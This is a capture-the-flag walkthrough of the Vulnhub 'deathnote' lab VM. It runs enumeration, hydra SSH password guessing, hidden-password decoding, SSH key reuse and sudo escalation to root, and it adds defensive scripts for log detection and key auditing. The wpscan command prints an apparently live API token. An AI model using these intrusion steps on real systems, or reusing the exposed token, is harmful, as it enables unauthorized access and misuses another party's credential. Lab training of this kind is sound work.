
Vulnhub-deathnote

A replay of the Vulnhub deathnote box. Anime-themed boxes are my favourite, haha.

Port scanning

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.40
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 10:38 CST
Nmap scan report for 192.168.179.40 (192.168.179.40)
Host is up (0.0028s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
| 256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_ 256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 1A:04:7A:CB:01:C4 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 2.76 ms 192.168.179.40 (192.168.179.40)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Web enumeration

Let's go straight to port 80 and see what's there.

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.40
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="1; url='http://deathnote.vuln/wordpress" />
</head>
<body>
<cente> <p>Please wait.....</p></center>
</body>
</html>

WordPress shows up in the redirect, so start with a directory scan.

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.40 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -x html,php,jpg,wbpg
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.179.40
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,jpg,wbpg
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 197]
/.htaccess (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htaccess.jpg (Status: 403) [Size: 279]
/.htaccess.wbpg (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 68]
/. (Status: 200) [Size: 197]
/.html (Status: 403) [Size: 279]
/.html.html (Status: 403) [Size: 279]
/.html.php (Status: 403) [Size: 279]
/.html.jpg (Status: 403) [Size: 279]
/.html.wbpg (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htpasswd.jpg (Status: 403) [Size: 279]
/.htpasswd.wbpg (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htm (Status: 403) [Size: 279]
/.htm.html (Status: 403) [Size: 279]
/.htm.wbpg (Status: 403) [Size: 279]
/.htm.jpg (Status: 403) [Size: 279]
/.htm.php (Status: 403) [Size: 279]
/.htpasswds.html (Status: 403) [Size: 279]
/.htpasswds (Status: 403) [Size: 279]
/.htpasswds.php (Status: 403) [Size: 279]
/.htpasswds.wbpg (Status: 403) [Size: 279]
/.htpasswds.jpg (Status: 403) [Size: 279]
/.htgroup (Status: 403) [Size: 279]
/.htgroup.html (Status: 403) [Size: 279]
/.htgroup.wbpg (Status: 403) [Size: 279]
/.htgroup.jpg (Status: 403) [Size: 279]
/.htgroup.php (Status: 403) [Size: 279]
/wp-forum.phps (Status: 403) [Size: 279]
/.htaccess.bak.php (Status: 403) [Size: 279]
/.htaccess.bak.jpg (Status: 403) [Size: 279]
/.htaccess.bak (Status: 403) [Size: 279]
/.htaccess.bak.html (Status: 403) [Size: 279]
/.htaccess.bak.wbpg (Status: 403) [Size: 279]
/.htuser.php (Status: 403) [Size: 279]
/.htuser.html (Status: 403) [Size: 279]
/.htuser (Status: 403) [Size: 279]
/.htuser.jpg (Status: 403) [Size: 279]
/.htuser.wbpg (Status: 403) [Size: 279]
/.ht (Status: 403) [Size: 279]
/.ht.html (Status: 403) [Size: 279]
/.htc.html (Status: 403) [Size: 279]
/.ht.php (Status: 403) [Size: 279]
/.htc (Status: 403) [Size: 279]
/.ht.jpg (Status: 403) [Size: 279]
/.ht.wbpg (Status: 403) [Size: 279]
/.htc.wbpg (Status: 403) [Size: 279]
/.htc.php (Status: 403) [Size: 279]
/.htc.jpg (Status: 403) [Size: 279]
Progress: 81220 / 81225 (99.99%)
===============================================================
Finished
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.40/robots.txt
fuck it my dad
added hint on /important.jpg

ryuk please delete it

There's a hint here pointing to /important.jpg, and what looks like a user named ryuk.
Opening that path in a browser shows nothing but a broken-image icon, but fetching it with curl returns text.

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.179.40/important.jpg
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira

i can only help you by giving something important

login username : user.txt
i don't know the password.
find it by yourself
but i think it is in the hint section of site

Now this is familiar ground, haha: Light and L are names I know. The hint says the login username is in user.txt and the password is in the hint section.
The directory scan also turned up an index.html, so let's look at that, but it can't be opened: it redirects to an unknown URL.
The hint is supposed to be in the hint section, so try 192.168.179.40/hint: nothing. /important/hint: nothing either.
I got stuck here, so I watched the video by the group owner ll104567 and realised my approach was a bit off: WordPress really is used,
and going by the result of the direct request, the hosts file has to be edited first.

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.40
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="1; url='http://deathnote.vuln/wordpress" />
</head>
<body>
<cente> <p>Please wait.....</p></center>
</body>
</html>

192.168.179.40 deathnote.vuln

This "my fav line is iamjustic3" must be useful, otherwise it wouldn't have been put here.
Now run wpscan.

┌──(root㉿kakeru)-[~/tmp]
└─# wpscan --api-token r4NahZxa7hHyx6tcZVYdfivP0YNXqmTaJXwqgMatwmE --enumerate u,vp --plugins-detection aggressive --url http://deathnote.vuln/wordpress
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

Found an upload directory with listing enabled; browsing it shows the files.

Viewing the source of the hint page also reveals this path.

user.txt and note.txt are here. user.txt is surely the list of usernames, but note.txt isn't necessarily the passwords.
Try brute-forcing with hydra first.

┌──(root㉿kakeru)-[~/tmp]
└─# hydra -L user.txt -P note.txt ssh://192.168.179.40
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 12:13:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43), ~46 tries per task
[DATA] attacking ssh://192.168.179.40:22/
[STATUS] 280.00 tries/min, 280 tries in 00:01h, 453 to do in 00:02h, 14 active
[22][ssh] host: 192.168.179.40 login: l password: death4me
[STATUS] 283.00 tries/min, 566 tries in 00:02h, 167 to do in 00:01h, 14 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 12:16:03
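
From the defender's side, a wordlist run like this shows up in the target's auth log as a burst of failed password attempts from one source address, often followed by a single success. As an added example (not part of the original walkthrough), here is a small sliding-window detector run over a constructed auth.log excerpt; the log lines, PIDs and the 192.168.179.1 / 192.168.179.50 source addresses are made up for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample auth.log excerpt (not captured from the box): the
# shape a password-guessing run leaves on the target side.
SAMPLE_AUTH_LOG = """\
Feb 11 12:13:22 deathnote sshd[1201]: Failed password for invalid user ryuk from 192.168.179.1 port 40001 ssh2
Feb 11 12:13:22 deathnote sshd[1203]: Failed password for invalid user light from 192.168.179.1 port 40002 ssh2
Feb 11 12:13:23 deathnote sshd[1205]: Failed password for l from 192.168.179.1 port 40003 ssh2
Feb 11 12:13:23 deathnote sshd[1207]: Failed password for l from 192.168.179.1 port 40004 ssh2
Feb 11 12:13:24 deathnote sshd[1209]: Failed password for invalid user misa from 192.168.179.1 port 40005 ssh2
Feb 11 12:13:24 deathnote sshd[1211]: Failed password for l from 192.168.179.1 port 40006 ssh2
Feb 11 12:13:25 deathnote sshd[1213]: Accepted password for l from 192.168.179.1 port 40007 ssh2
Feb 11 12:20:01 deathnote sshd[1300]: Failed password for kira from 192.168.179.50 port 51000 ssh2
Feb 11 12:45:10 deathnote sshd[1310]: Failed password for kira from 192.168.179.50 port 51001 ssh2
"""

# Matches the two sshd password-auth line shapes ("... for USER from IP"
# and "... for invalid user USER from IP"); other lines are ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse(log_text: str, year: int = 2025):
    """Turn sshd password-auth lines into event dicts (syslog has no year,
    so one is supplied)."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"],
                       "user": m["user"], "ip": m["ip"]})
    return events


def detect_bruteforce(events, threshold: int = 5, window_seconds: int = 60):
    """Flag source IPs with >= threshold failed logins inside any
    window_seconds span (sliding window), record which usernames they
    tried, and note whether a later successful login came from a
    flagged IP, which is the case that needs an incident, not a ban."""
    recent = defaultdict(deque)      # ip -> timestamps of recent failures
    users_by_ip = defaultdict(set)   # ip -> usernames attempted
    findings = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ip = ev["ip"]
        if ev["result"] == "Failed":
            users_by_ip[ip].add(ev["user"])
            q = recent[ip]
            q.append(ev["ts"])
            # drop failures that fell out of the window
            while (q[-1] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold:
                f = findings.setdefault(ip, {"count": 0, "success_after": False})
                f["count"] = max(f["count"], len(q))
                f["users"] = sorted(users_by_ip[ip])
        elif ip in findings:
            findings[ip]["success_after"] = True
    return findings


if __name__ == "__main__":
    for ip, f in detect_bruteforce(parse(SAMPLE_AUTH_LOG)).items():
        print(ip, f)
```

The second source in the sample (two failures 25 minutes apart) is deliberately below the threshold, so the detector reports only the burst source, with the usernames it cycled through and the fact that it eventually logged in.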

Username and password obtained.
Log in to l's shell.

┌──(root㉿kakeru)-[~/tmp]
└─# ssh l@192.168.179.40
l@192.168.179.40's password:
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:12:29 2021 from 192.168.1.6
l@deathnote:~$ sudo -l
[sudo] password for l:
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$

Privilege escalation

We just saw there's no sudo; check SUID binaries as well, but nothing useful there either.

l@deathnote:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh

The home directory has a user.txt encoded in Brainfuck; decoded, it reads:

'i think u got the shell , but you wont be able to kill me -kira'

Only a taunt, nothing more.
Since neither sudo nor SUID gets us anywhere, and /home holds another user, kira, we clearly need to become kira first.
So look for l's files, but far too many files are owned by l, so I search for files named l instead.

l@deathnote:~$ find / -name "l" 2>/dev/null
/home/l
/usr/share/terminfo/l
/usr/lib/terminfo/l
/var/lib/sudo/lectured/l

l@deathnote:~$ find / -name "L" 2>/dev/null
/usr/share/terminfo/L
/opt/L

Found something suspicious: /opt/L

l@deathnote:/opt/L$ ls
fake-notebook-rule kira-case
l@deathnote:/opt/L$ cd fake-notebook-rule/
l@deathnote:/opt/L/fake-notebook-rule$ ls
case.wav hint
l@deathnote:/opt/L/fake-notebook-rule$ file hint
hint: ASCII text
l@deathnote:/opt/L/fake-notebook-rule$ cat hint
use cyberchef

l@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d

The hint is indeed useful; decode it with CyberChef.
First "From Hex" yields a base64 string, then "From Base64" decodes it.

passwd : kiraisevil 
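
The same hex-then-base64 chain can be done without CyberChef. The following is an added example, not part of the original walkthrough: it peels encoding layers one at a time and accepts a layer only when its output is printable text, which is what keeps it from treating random bytes as yet another layer. The input is the case.wav content shown above; a plain base64 string (such as the one in kira.txt later on) goes through the same function as a single layer.

```python
import base64
import binascii
import re
import string

# Constructed sample: the contents of /opt/L/fake-notebook-rule/case.wav
# as shown in the walkthrough (space-separated hex).
CASE_WAV = ("63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 "
            "59 57 6c 7a 5a 58 5a 70 62 43 41 3d")

HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}\s*)+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def is_printable(data: bytes) -> bool:
    """True if the bytes are ASCII text a human could read."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return all(c in string.printable for c in text)


def decode_one_layer(text: str):
    """Try hex, then base64; return (layer_name, decoded_text) or None.
    A candidate layer only counts if its output is printable, so a
    string that merely looks like base64 is not decoded into garbage."""
    stripped = text.strip()
    if HEX_RE.match(stripped):
        try:
            raw = binascii.unhexlify(re.sub(r"\s+", "", stripped))
        except binascii.Error:
            raw = None
        if raw is not None and is_printable(raw):
            return ("hex", raw.decode("ascii"))
    if B64_RE.match(stripped) and len(stripped) % 4 == 0:
        try:
            raw = base64.b64decode(stripped, validate=True)
        except binascii.Error:
            raw = None
        if raw is not None and is_printable(raw):
            return ("base64", raw.decode("ascii"))
    return None


def peel(text: str, max_layers: int = 5):
    """Repeatedly strip encoding layers; returns [(layer, text), ...],
    innermost last. Stops when nothing recognisable is left."""
    layers = []
    current = text
    for _ in range(max_layers):
        result = decode_one_layer(current)
        if result is None:
            break
        layers.append(result)
        current = result[1]
    return layers


if __name__ == "__main__":
    for layer, value in peel(CASE_WAV):
        print(f"[{layer}] {value!r}")
```

The printable-text check is the important design choice: without it, any run of hex digits or base64-looking text would be decoded one step too far and the real plaintext lost.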

The other file is a diary.

l@deathnote:/opt/L/kira-case$ cat case-file.txt 
the FBI agent died on December 27, 2006

1 week after the investigation of the task-force member/head.
aka.....
Soichiro Yagami's family .


hmmmmmmmmm......
and according to watari ,
he died as other died after Kira targeted them .


and we also found something in
fake-notebook-rule folder .

The rules of the Death Note, hahaha; anyone who has watched the anime knows this joke, so that's how the deathnote is used.
Now that we have kira's password, switch to the kira user.
After watching ll104567's video, I found there's another way to switch to kira as well.

l@deathnote:/opt/L/kira-case$ cd /home
l@deathnote:/home$ ls
kira l
l@deathnote:/home$ cd kira

l@deathnote:/home/kira$ ls -al
total 36
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 kira kira 39 Feb 10 23:48 .bash_history
-rw-r--r-- 1 kira kira 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19 2021 .bashrc
-rwx------ 1 kira root 85 Aug 29 2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19 2021 .local
-rw-r--r-- 1 kira kira 807 Jul 19 2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .ssh
l@deathnote:/home/kira$ cd .ssh
l@deathnote:/home/kira/.ssh$ ls
authorized_keys
l@deathnote:/home/kira/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote

The public key in this authorized_keys is l's, so l's private key can log in as kira.

l@deathnote:~/.ssh$ ls
id_rsa id_rsa.pub known_hosts
l@deathnote:~/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
l@deathnote:~/.ssh$ ssh kira@192.168.179.40 -i id_rsa
The authenticity of host '192.168.179.40 (192.168.179.40)' can't be established.
ECDSA key fingerprint is SHA256:IT1oaQY12jhOmyoQGZC1hKHtYUWy6i8rET2yKX0KkpI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.179.40' (ECDSA) to the list of known hosts.
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:00:09 2021 from 127.0.0.1
kira@deathnote:~$
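
The reason this key login works is a misconfiguration a defender would want to catch on any host: another account's public key sitting in kira's authorized_keys. As an added example, not from the original walkthrough, here is an audit that flags authorized_keys entries whose blob matches a different user's id_*.pub or whose comment names a different user, and reports the OpenSSH-style SHA256 fingerprint of each. The file contents are constructed inline: the authorized_keys line is the one shown above, and it is an assumption for this example that /home/l/.ssh/id_rsa.pub carries the same blob with the same comment.

```python
import base64
import binascii
import hashlib

# The public key blob found in /home/kira/.ssh/authorized_keys above.
KEY_BLOB = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9"
    "XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0"
    "i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0W"
    "iU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75m"
    "i6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/a"
    "QICFZ6z"
)

# Constructed stand-in for the ~/.ssh files of each account. That l's
# id_rsa.pub holds the same blob is an assumption of this example.
HOME_SSH_FILES = {
    "kira": {"authorized_keys": f"ssh-rsa {KEY_BLOB} l@deathnote\n"},
    "l": {"id_rsa.pub": f"ssh-rsa {KEY_BLOB} l@deathnote\n",
          "authorized_keys": ""},
}

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521", "ssh-dss")


def parse_key_line(line: str):
    """Return (key_type, blob, comment) for one authorized_keys or .pub
    line; None for blank lines and comments. A leading options field
    (command=..., from=...) is skipped by locating the key-type token."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    for i, tok in enumerate(parts):
        if tok in KEY_TYPES and i + 1 < len(parts):
            return tok, parts[i + 1], " ".join(parts[i + 2:])
    return None


def fingerprint(blob: str) -> str:
    """OpenSSH-style fingerprint: SHA256 of the decoded blob, base64
    without padding, as ssh-keygen -lf prints it."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return "SHA256:<undecodable>"
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit(home_ssh_files):
    """Flag authorized_keys entries that let one account's key open
    another account. Returns a list of finding dicts."""
    owners = {}  # blob -> user whose id_*.pub contains it
    for user, files in home_ssh_files.items():
        for name, content in files.items():
            if name.startswith("id_") and name.endswith(".pub"):
                for line in content.splitlines():
                    parsed = parse_key_line(line)
                    if parsed:
                        owners[parsed[1]] = user
    findings = []
    for user, files in home_ssh_files.items():
        for line in files.get("authorized_keys", "").splitlines():
            parsed = parse_key_line(line)
            if not parsed:
                continue
            ktype, blob, comment = parsed
            reasons = []
            owner = owners.get(blob)
            if owner and owner != user:
                reasons.append(f"blob matches {owner}'s own public key")
            comment_user = comment.split("@")[0] if comment else ""
            if comment_user and comment_user != user:
                reasons.append(f"comment '{comment}' names user {comment_user}")
            if reasons:
                findings.append({"account": user, "type": ktype,
                                 "fingerprint": fingerprint(blob),
                                 "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(HOME_SSH_FILES):
        print(f["account"], f["type"], f["fingerprint"], "; ".join(f["reasons"]))
```

The comment heuristic is only a hint (comments are free text and can be edited), so the blob comparison is the finding that counts; on a real host the dictionary would be filled by reading each home directory's .ssh files.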

Then, from the content of kira.txt, /opt/L can also be found and kira's password obtained; carry on from there.

kira@deathnote:~$ ls
kira.txt
kira@deathnote:~$ cat kira.txt
cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp
kira@deathnote:~$ echo "cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp" | base64 -d
please protect one of the following
1. L (/opt)
2. Misa (/var)kira@deathnote:~$

kira@deathnote:~$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on deathnote:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:~$ su - root
Password:
su: Authentication failure
kira@deathnote:~$ sudo /bin/bash
root@deathnote:/home/kira# id
uid=0(root) gid=0(root) groups=0(root)
root@deathnote:/home/kira#

So this is what being kami feels like, having every permission.

I went out of my way to dig up the famous scene, haha. This anime is really excellent, highly recommended.